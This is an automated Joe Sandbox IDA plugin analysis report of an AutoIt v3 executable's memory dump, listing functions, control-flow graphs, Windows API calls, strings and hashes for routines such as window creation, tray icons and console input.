                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e83757b6ced4491b30f685a269c4a406de0d2f55d379c9d09696c4c8275838e
                                                                                                                                                                                                                                                                                                    • Instruction ID: d0bac72f8e51d3a8b40c846c1d773b128ffbbcef82409fdf563ec7597909ecfa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e83757b6ced4491b30f685a269c4a406de0d2f55d379c9d09696c4c8275838e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3541E7F7100185BBDF18EFAC9D8ABF93A79E741300F004125F902891E1DAB49B898761
                                                                                                                                                                                                                                                                                                    Function 00A490C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 633 a490c5-a490d5 634 a490d7-a490ea call a3f636 call a3f649 633->634 635 a490ef-a490f1 633->635 651 a49471 634->651 637 a490f7-a490fd 635->637 638 a49459-a49466 call a3f636 call a3f649 635->638 637->638 641 a49103-a4912e 637->641 656 a4946c call a42b5c 638->656 641->638 644 a49134-a4913d 641->644 647 a49157-a49159 644->647 648 a4913f-a49152 call a3f636 call a3f649 644->648 649 a49455-a49457 647->649 650 a4915f-a49163 647->650 648->656 655 a49474-a49479 649->655 650->649 654 a49169-a4916d 650->654 651->655 654->648 658 a4916f-a49186 654->658 656->651 661 a491a3-a491ac 658->661 662 a49188-a4918b 658->662 666 a491ae-a491c5 call a3f636 call a3f649 call a42b5c 661->666 667 a491ca-a491d4 661->667 664 a49195-a4919e 662->664 665 a4918d-a49193 662->665 668 a4923f-a49259 664->668 665->664 665->666 699 a4938c 666->699 670 a491d6-a491d8 667->670 671 a491db-a491dc call a43b93 667->671 672 a4932d-a49336 call a4fc1b 668->672 673 a4925f-a4926f 668->673 670->671 677 a491e1-a491f9 call a42d38 * 2 671->677 686 a49338-a4934a 672->686 687 a493a9 672->687 673->672 676 a49275-a49277 673->676 676->672 680 a4927d-a492a3 676->680 702 a49216-a4923c call a497a4 677->702 703 a491fb-a49211 call a3f649 call a3f636 677->703 680->672 684 a492a9-a492bc 680->684 684->672 689 a492be-a492c0 684->689 686->687 692 a4934c-a4935b GetConsoleMode 686->692 691 a493ad-a493c5 ReadFile 687->691 689->672 694 a492c2-a492ed 689->694 696 a493c7-a493cd 691->696 697 a49421-a4942c GetLastError 691->697 692->687 698 a4935d-a49361 692->698 694->672 701 a492ef-a49302 694->701 696->697 706 a493cf 696->706 704 a49445-a49448 697->704 705 a4942e-a49440 call a3f649 call a3f636 697->705 698->691 707 a49363-a4937d ReadConsoleW 698->707 700 a4938f-a49399 call a42d38 699->700 700->655 701->672 713 a49304-a49306 701->713 702->668 703->699 710 a49385-a4938b call a3f613 704->710 711 a4944e-a49450 704->711 705->699 717 a493d2-a493e4 706->717 708 a4939e-a493a7 707->708 709 a4937f GetLastError 707->709 708->717 709->710 710->699 711->700 713->672 720 a49308-a49328 713->720 717->700 724 a493e6-a493ea 717->724 720->672 728 a49403-a4940e 724->728 729 a493ec-a493fc call a48de1 724->729 731 a49410 call a48f31 728->731 732 a4941a-a4941f call a48c21 728->732 738 a493ff-a49401 729->738 739 a49415-a49418 731->739 732->739 738->700 739->738
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: 79599681bd5eaedd4308db87f2d7c517202dc580c5f67541b3230267c4ca2311
                                                                                                                                                                                                                                                                                                    • Instruction ID: 314460939e3eeafb289500cc047cb2c563fd109956d2e0cff342af75c75ff002
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79599681bd5eaedd4308db87f2d7c517202dc580c5f67541b3230267c4ca2311
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AC1D278D042899FDF11DFE8D841BAFBBB4AF8A310F144159F554AB2D2C730A952CB61
                                                                                                                                                                                                                                                                                                    Function 00A2AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 741 a2ac3e-a2b063 call a18ec0 call a2bc58 call a1e6a0 748 a68584-a68591 741->748 749 a2b069-a2b073 741->749 750 a68596-a685a5 748->750 751 a68593 748->751 752 a2b079-a2b07e 749->752 753 a6896b-a68979 749->753 754 a685a7 750->754 755 a685aa 750->755 751->750 758 a685b2-a685b4 752->758 759 a2b084-a2b090 call a2b5b6 752->759 756 a6897e 753->756 757 a6897b 753->757 754->755 755->758 760 a68985-a6898e 756->760 757->756 764 a685bd 758->764 759->764 766 a2b096-a2b0a3 call a1c98d 759->766 762 a68993 760->762 763 a68990 760->763 769 a6899c-a689eb call a1e6a0 call a2bbbe * 2 762->769 763->762 768 a685c7 764->768 772 a2b0ab-a2b0b4 766->772 773 a685cf-a685d2 768->773 802 a2b1e0-a2b1f5 769->802 803 a689f1-a68a03 call a2b5b6 769->803 775 a2b0b8-a2b0d6 call a34d98 772->775 776 a2b158-a2b16f 773->776 777 a685d8-a68600 call a34cd3 call a17ad5 773->777 797 a2b0e5 775->797 798 a2b0d8-a2b0e1 775->798 780 a68954-a68957 776->780 781 a2b175 776->781 813 a68602-a68606 777->813 814 a6862d-a68651 call a17b1a call a1bd98 777->814 786 a68a41-a68a79 call a1e6a0 call a2bbbe 780->786 787 a6895d-a68960 780->787 788 a688ff-a68920 call a1e6a0 781->788 789 a2b17b-a2b17e 781->789 786->802 838 a68a7f-a68a91 call a2b5b6 786->838 787->769 794 a68962-a68965 787->794 788->802 818 a68926-a68938 call a2b5b6 788->818 795 a2b184-a2b187 789->795 796 a68729-a68743 call a2bbbe 789->796 794->753 794->802 804 a686ca-a686e0 call a16c03 795->804 805 a2b18d-a2b190 795->805 823 a6888f-a688b5 call a1e6a0 796->823 824 a68749-a6874c 796->824 797->768 808 a2b0eb-a2b0fc 797->808 798->775 806 a2b0e3 798->806 820 a2b1fb-a2b20b call a1e6a0 802->820 821 a68ac9-a68acf 802->821 843 a68a05-a68a0d 803->843 844 a68a2f-a68a3c call a1c98d 803->844 804->802 841 a686e6-a686fc call a2b5b6 804->841 816 a68656-a68659 805->816 817 a2b196-a2b1b8 call a1e6a0 805->817 806->808 808->753 819 a2b102-a2b11c 808->819 813->814 827 a68608-a6862b call a1ad40 813->827 814->816 816->753 833 a6865f-a68674 call a16c03 816->833 817->802 860 a2b1ba-a2b1cc call a2b5b6 817->860 863 a68945 818->863 864 a6893a-a68943 call a1c98d 818->864 819->773 832 a2b122-a2b154 call a2bbbe call a1e6a0 819->832 821->772 825 a68ad5 821->825 823->802 869 a688bb-a688cd call a2b5b6 823->869 836 a6874e-a68751 824->836 837 a687bf-a687de call a1e6a0 824->837 825->753 827->813 827->814 832->776 833->802 865 a6867a-a68690 call a2b5b6 833->865 850 a68757-a68774 call a1e6a0 836->850 851 a68ada-a68ae8 836->851 837->802 887 a687e4-a687f6 call a2b5b6 837->887 883 a68ab5-a68abe call a1c98d 838->883 884 a68a93-a68a9b 838->884 888 a686fe-a6870b call a18ec0 841->888 889 a6870d-a68716 call a18ec0 841->889 858 a68a1e-a68a29 call a1b4b1 843->858 859 a68a0f-a68a13 843->859 895 a68ac2-a68ac4 844->895 850->802 898 a6877a-a6878c call a2b5b6 850->898 872 a68aed-a68afd 851->872 873 a68aea 851->873 858->844 906 a68b0b-a68b19 858->906 859->858 875 a68a15-a68a19 859->875 907 a2b1d2-a2b1de 860->907 908 a686ba-a686c3 call a1c98d 860->908 866 a68949-a6894f 863->866 864->866 909 a68692-a6869b call a1c98d 865->909 910 a6869d-a686ab call a18ec0 865->910 866->802 913 a688de 869->913 914 a688cf-a688dc call a1c98d 869->914 890 a68b02-a68b06 872->890 891 a68aff 872->891 873->872 892 a68aa1-a68aa3 875->892 883->895 899 a68a9d 884->899 900 a68aa8-a68ab3 call a1b4b1 884->900 887->802 929 a687fc-a68805 call a2b5b6 887->929 930 a68719-a68724 call a18577 888->930 889->930 890->820 891->890 892->802 895->802 933 a6878e-a6879d call a1c98d 898->933 934 a6879f 898->934 899->892 900->883 900->906 919 a68b1e-a68b21 906->919 920 a68b1b 906->920 907->802 908->804 940 a686ae-a686b5 909->940 910->940 928 a688e2-a688e9 913->928 914->928 919->760 920->919 936 a688f5 call a13907 928->936 937 a688eb-a688f0 call a1396b 928->937 951 a68807-a68816 call a1c98d 929->951 952 a68818 929->952 930->802 942 a687a3-a687ae call a39334 933->942 934->942 950 a688fa 936->950 937->802 940->802 942->753 956 a687b4-a687ba 942->956 950->802 955 a6881c-a6883f 951->955 952->955 958 a68841-a68848 955->958 959 a6884d-a68850 955->959 956->802 958->959 960 a68852-a6885b 959->960 961 a68860-a68863 959->961 960->961 962 a68865-a6886e 961->962 963 a68873-a68876 961->963 962->963 963->802 964 a6887c-a6888a 963->964 964->802
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                                    • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5467567adfb9840c3bfeb61cb9c17eecd95cf884e930445160f28a6c9661ae40
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9105e1b9720abab837dcd0ad028f668ae3d0f4477dee6b429c270985c89043da
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5467567adfb9840c3bfeb61cb9c17eecd95cf884e930445160f28a6c9661ae40
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83623670508341CFC724CF18D195AAABBF5BF89304F148A6EE89A8B391DB71D945CF92
                                                                                                                                                                                                                                                                                                    Function 00A135B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 1001 a135b3-a13623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A135E1
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A13602
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A13616
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00A13368,?), ref: 00A1361F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07cfe97f136322fc212ac44032fcd9df4ea67382fb43f457faa99fd4cd2399f7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 226d122b808dcb3c326f2c3f78153676d7153f9f929509ce841829725bba14ec
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07cfe97f136322fc212ac44032fcd9df4ea67382fb43f457faa99fd4cd2399f7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5F017746402D67AE7259793AC88F372EBDE7C7F50B00001EB904AF5A0D2690842DFB0
                                                                                                                                                                                                                                                                                                    Function 00A161A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A55287
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A18577: _wcslen.LIBCMT ref: 00A1858A
                                                                                                                                                                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A16299
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                                    • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                                    • Opcode ID: d897a833ef9a319b562f217f569a4b09f84e6df91f63fd126f052eb5d5f50d8c
                                                                                                                                                                                                                                                                                                    • Instruction ID: b66eda8b22d9390351b10ea3a332ac3d65e8c2e947829c34817d905b53cd2f72
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d897a833ef9a319b562f217f569a4b09f84e6df91f63fd126f052eb5d5f50d8c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1419571808305AAC711EB60DD45BDF77ECAF94310F104A2EF59996091EB749689CB92
                                                                                                                                                                                                                                                                                                    Function 00A158CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 1053 a158cb-a158d6 1054 a15948-a1594a 1053->1054 1055 a158d8-a158dd 1053->1055 1056 a1593b-a1593e 1054->1056 1055->1054 1057 a158df-a158f7 RegOpenKeyExW 1055->1057 1057->1054 1058 a158f9-a15918 RegQueryValueExW 1057->1058 1059 a1591a-a15925 1058->1059 1060 a1592f-a1593a RegCloseKey 1058->1060 1061 a15927-a15929 1059->1061 1062 a1593f-a15946 1059->1062 1060->1056 1063 a1592d 1061->1063 1062->1063 1063->1060
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A158BE,SwapMouseButtons,00000004,?), ref: 00A158EF
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A158BE,SwapMouseButtons,00000004,?), ref: 00A15910
                                                                                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00A158BE,SwapMouseButtons,00000004,?), ref: 00A15932
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2978b6c8745fd9c8b72bcb5e2616fb3aac7147f2a79587436cea30a81ad25cc9
                                                                                                                                                                                                                                                                                                    • Instruction ID: e882169365b9ce3d976c9486a7da8d63a65d02e476bfe8eb7ffd0fcdcc78ca83
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2978b6c8745fd9c8b72bcb5e2616fb3aac7147f2a79587436cea30a81ad25cc9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8115A75910618FFDB218FB4CC809EEB7BCEF41760B104419F842E7210E2319E81D7A5
                                                                                                                                                                                                                                                                                                    Function 00A1F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Variable must be of type 'Object'., xrefs: 00A648C6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                                    • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                                    • Opcode ID: 187892abaf8905d41b5ecd570f9e88ecdc22f7ad435e21636b48dcaa756b559a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 29013cd428144d01b2de92421eb14a08a741d72289103d6f4e0a3403f0106867
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 187892abaf8905d41b5ecd570f9e88ecdc22f7ad435e21636b48dcaa756b559a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CC29A75E00255DFCB24CFA8D990AADB7F1FF09310F24816AE945AB391D375AD82CB90
                                                                                                                                                                                                                                                                                                    Function 00A20340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00A215F2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b365a2948e719950623a16dcbfac70af8e138c1f68877c1788e1af578e3bbbb
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e574071c78c5ceaa98db612c0162fc5c93bdccffddbeeb4541fde44efc74073
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b365a2948e719950623a16dcbfac70af8e138c1f68877c1788e1af578e3bbbb
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60B25975A08361CFCB24CF18E590A2AB7F1BB99300F14896DF9869B352D771ED41CB92
                                                                                                                                                                                                                                                                                                    Function 00A3014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A309D8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A33614: RaiseException.KERNEL32(?,?,?,00A309FA,?,00000000,?,?,?,?,?,?,00A309FA,00000000,00AD9758,00000000), ref: 00A33674
                                                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A309F5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                    • Opcode ID: d57297892e1145552883c7daaf91f6a110a25ce308ed7a3592668eb4cc1e442c
                                                                                                                                                                                                                                                                                                    • Instruction ID: fe3f5e481e09192ced57a8e30969312cf264f2a56da85ffe338a9310cd85a5dd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d57297892e1145552883c7daaf91f6a110a25ce308ed7a3592668eb4cc1e442c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F06234D0420DBB9F00BBA8ED66E9F777C5E00350F604561BA14D65D2FB70EA55C6D0
                                                                                                                                                                                                                                                                                                    Function 00A989B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
